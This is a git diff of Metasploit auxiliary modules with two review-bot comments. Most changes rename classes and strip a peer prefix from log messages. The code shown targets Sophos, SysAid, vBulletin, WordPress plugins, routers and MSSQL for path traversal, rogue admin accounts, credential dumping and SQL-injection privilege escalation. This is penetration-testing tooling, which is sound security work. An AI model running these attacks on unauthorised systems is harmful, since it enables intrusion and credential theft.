+++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << file travs << "%00" - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") + print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") if is_proficy? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found") + print_error("Sophos Web Protect Appliance vulnerable component not found") return end contents = read_file(datastore['FILEPATH']) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index be790a49dd..78a9a2cee8 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.code == 200 && res.body.to_s =~ /Error while creating account/ # No way to know whether this worked or not, it always says error - print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") + print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") service_data = { address: rhost, port: rport, @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) else - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end end end diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index e11ccfc8ae..00ebbc8800 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end def get_traversal_path - print_status("#{peer} - Trying to find out the traversal path...") + print_status("Trying to find out the traversal path...") large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary }, }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end end 
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.') end - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/ file_path = $3 else @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary traversal_path = get_traversal_path if traversal_path.nil? - print_error("#{peer} - Could not get traversal path, using bruteforce to download the file") + print_error("Could not get traversal path, using bruteforce to download the file") count = 1 while count < 15 res = download_file(('../' * count) + file_path) diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a219171e5..38d7e8b2a8 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end - print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") + print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b987960189..a01e9ce969 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer 
diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index ae1f0a6a32..bbe5f28383 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 5e5043da0e..043fb814b9 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index dd8fb6ca8c..89ab23faa7 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 3e43c502d6..90f8a5105c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 69db942e3a..1958ef82f4 100644 
--- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'thread' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index e908b1bd14..596d5a0806 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index b9efc4ae7f..93b7c1351b 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Auxiliary def run if user == pass - print_error("#{peer} - Please select a password different than the username") + print_error("Please select a password different than the username") return end - print_status("#{peer} - Trying a new admin vBulletin account...") + print_status("Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /Administrator account created/ - print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") + print_good("Admin account with credentials #{user}:#{pass} successfully created") report_cred( ip: rhost, port: rport, @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary proof: res.body ) else - print_error("#{peer} - Admin account creation failed") + print_error("Admin account creation failed") end end end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index b86b2ee014..46f6a33d20 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Auxiliary username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) - print_status("#{peer} - Trying to get table_prefix") + print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? - print_error("#{peer} - Unable to get table_prefix") + print_error("Unable to get table_prefix") return else - print_status("#{peer} - got table_prefix '#{table_prefix}'") + print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s - print_status("#{peer} - Inserting user #{username} with password #{password}") + print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, 
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # login successfull if cookie - print_status("#{peer} - User #{username} with password #{password} successfully created") + print_status("User #{username} with password #{password} successfully created") report_cred( ip: rhost, port: rport, @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary proof: cookie ) else - print_error("#{peer} - User creation failed") + print_error("User creation failed") return end end diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 2a8c26fba6..3897eb9730 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) 
@@ -65,44 +65,44 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") elsif res.code != 200 - vprint_warning("#{peer} - Server responded with status code #{res.code}") + vprint_warning("Server responded with status code #{res.code}") end res end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) if cookie.nil? - print_error("#{peer} - Failed to authenticate with WordPress") + print_error("Failed to authenticate with WordPress") return end - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? - print_error("#{peer} - Failed to change the admin e-mail address") + print_error("Failed to change the admin e-mail address") return end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? - print_error("#{peer} - Failed to enable user registrations") + print_error("Failed to enable user registrations") return end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? 
- print_error("#{peer} - Failed to set the default user role") + print_error("Failed to set the default user role") return end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 2fada64417..e60e2c2049 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary def set_wp_option(name, value, cookie) encoded_value = serialize_and_encode(value) if encoded_value.nil? - vprint_error("#{peer} - Failed to serialize #{value}.") + vprint_error("Failed to serialize #{value}.") else res = send_request_cgi( 'method' => 'POST', @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") else - vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_warning("Server responded with status code #{res.code}") if res.code != 200 end return res 
@@ -97,29 +97,29 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address') end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations') end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to set the default user role') end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb index ec3ce10323..d920351496 100644 --- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb 
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb index 6c8f0d29c3..a9ed6fac2d 100644 --- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb +++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Kerberos::Client diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 27b931c1a7..fb9f275d2f 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 0ef51aa38a..e52ab58061 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to connect and check endianess...") + print_status("Attempting to connect and check endianess...") @endianess = fingerprint_endian @credentials = {} 
@@ -72,18 +72,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to check endianess, aborting...") return end - print_good("#{peer} - #{string_endianess} device found...") + print_good("#{string_endianess} device found...") - print_status("#{peer} - Attempting to connect and dump configuration...") + print_status("Attempting to connect and dump configuration...") config = dump_configuration if config.nil? - print_status("#{peer} - Error retrieving configuration, aborting...") + print_status("Error retrieving configuration, aborting...") return end loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations") - print_status("#{peer} - Router configuration dump stored in: #{loot_file}") + print_status("Router configuration dump stored in: #{loot_file}") parse_configuration(config[:data]) end @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary disconnect if res.blank? - vprint_error("#{peer} - No answer...") + vprint_error("No answer...") return end @@ -186,17 +186,17 @@ class Metasploit3 < Msf::Auxiliary end unless mark == 0x4d4d6353 - vprint_error("#{peer} - Incorrect mark when reading response") + vprint_error("Incorrect mark when reading response") return nil end unless zero == 0 - vprint_error("#{peer} - Incorrect zero when reading response") + vprint_error("Incorrect zero when reading response") return nil end unless length == data.length - vprint_warning("#{peer} - Inconsistent length / data packet") + vprint_warning("Inconsistent length / data packet") # return nil end @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary @credentials.each do |k,v| next unless v[:user] and v[:password] - print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + print_status("#{k}: User: #{v[:user]} Pass: #{v[:password]}") report_cred( ip: rhost, port: rport, 
@@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{peer} - #{regex[0]}: #{value}") + print_status("#{regex[0]}: #{value}") end end end diff --git a/modules/auxiliary/admin/misc/wol.rb b/modules/auxiliary/admin/misc/wol.rb index 8afcd0100e..276d8fe96d 100644 --- a/modules/auxiliary/admin/misc/wol.rb +++ b/modules/auxiliary/admin/misc/wol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 187b8a7d25..2b0f191a33 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index d067729154..326a510db4 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b7272a17cc..cd0ff5e1ec 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report 
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - if mssql_login_datastore == false + if !mssql_login_datastore print_error("Login was unsuccessful. Check your credentials.") disconnect return diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb index 27ad860676..dd4f419e52 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 83a8d2d1ec..aef9b655ff 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report 
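Review bot: The new guard `if !mssql_login_datastore` in `run` would read more idiomatically as `unless mssql_login_datastore`. The rewrite also changes behaviour slightly: the old `== false` test matched only a literal false, while the new form treats a nil return as a failed login too. That looks like the safer behaviour, but a brief comment such as `# nil or false both mean the login did not succeed` would make it clear the widening is intentional. `run` continues outside the hunk.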
@@ -39,49 +39,49 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Grabbing the SQL Server name and domain...") + print_status("Grabbing the SQL Server name and domain...") db_server_name = get_server_name if db_server_name.nil? - print_error("#{peer} - Unable to grab the server name") + print_error("Unable to grab the server name") return else - print_good("#{peer} - Server name: #{db_server_name}") + print_good("Server name: #{db_server_name}") end db_domain_name = get_domain_name if db_domain_name.nil? - print_error("#{peer} - Unable to grab domain name") + print_error("Unable to grab domain name") return end # Check if server is on a domain if db_server_name == db_domain_name - print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain") + print_error("The SQL Server does not appear to be part of a Windows domain") return else - print_good("#{peer} - Domain name: #{db_domain_name}") + print_good("Domain name: #{db_domain_name}") end - print_status("#{peer} - Grabbing the SID for the domain...") + print_status("Grabbing the SID for the domain...") windows_domain_sid = get_windows_domain_sid(db_domain_name) if windows_domain_sid.nil? - print_error("#{peer} - Could not recover the SQL Server's domain sid.") + print_error("Could not recover the SQL Server's domain sid.") return else - print_good("#{peer} - Domain sid: #{windows_domain_sid}") + print_good("Domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() total_rids = datastore['END_RID'] - datastore['START_RID'] - print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...") + print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...") domain_users = get_win_domain_users(windows_domain_sid) if domain_users.nil? 
- print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.") + print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.") return end # Print number of objects found and write to a file - print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.") + print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.") # Create table for report windows_domain_login_table = Rex::Ui::Text::Table.new( @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary (datastore['START_RID']..datastore['END_RID']).each do |principal_id| rid_diff = principal_id - datastore['START_RID'] if principal_id % 100 == 0 - print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete") + print_status("#{rid_diff} of #{total_rids } RID queries complete") end user_sid = build_user_sid(domain_sid, principal_id) @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary unless windows_login.empty? || windows_logins.include?(windows_login) windows_logins.push(windows_login) - print_good("#{peer} - #{windows_login}") + print_good(" #{windows_login}") end end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index dd90b59eef..be1343ef33 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb index f691a81169..254d745a02 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb 
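Review bot: In `run` of mssql_enum_domain_accounts_sqli.rb, `total_rids = datastore['END_RID'] - datastore['START_RID']` is one short of the number of queries, because the loop shown in the `@@ -179,7` hunk walks the inclusive range `(datastore['START_RID']..datastore['END_RID'])`. The rewritten "Brute forcing #{total_rids} RIDs" line therefore under-reports the total by one, and a START_RID above END_RID gives a negative count with no iterations at all. Consider `total_rids = datastore['END_RID'] - datastore['START_RID'] + 1` plus an early `return` with an error when the range is inverted. `run` continues past the end of this hunk.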
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 320c1850a6..979886b01e 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report 
@@ -30,62 +30,62 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name from ...") + print_status("Grabbing the database user name from ...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no esclation needed.") + print_error("#{db_user} is already a sysadmin, no esclation needed.") return else - print_good("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Check for trusted databases owned by sysadmins - print_status("#{peer} - Checking for trusted databases owned by sysadmins...") + print_status("Checking for trusted databases owned by sysadmins...") trust_db_list = check_trust_dbs if trust_db_list.nil? 
|| trust_db_list.length == 0 - print_error("#{peer} - No databases owned by sysadmin were found flagged as trustworthy.") + print_error("No databases owned by sysadmin were found flagged as trustworthy.") return else # Display list of accessible databases to user - print_good("#{peer} - #{trust_db_list.length} affected database(s) were found:") + print_good("#{trust_db_list.length} affected database(s) were found:") trust_db_list.each do |db| print_status(" - #{db}") end end # Check if the user has the db_owner role in any of the databases - print_status("#{peer} - Checking if #{db_user} has the db_owner role in any of them...") + print_status("Checking if #{db_user} has the db_owner role in any of them...") owner_status = check_db_owner(trust_db_list) if owner_status.nil? - print_error("#{peer} - Fail buckets, the user doesn't have db_owner role anywhere.") + print_error("Fail buckets, the user doesn't have db_owner role anywhere.") return else - print_good("#{peer} - #{db_user} has the db_owner role on #{owner_status}.") + print_good("#{db_user} has the db_owner role on #{owner_status}.") end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to add #{db_user} to sysadmin role...") + print_status("Attempting to add #{db_user} to sysadmin role...") escalate_privs(owner_status, db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a 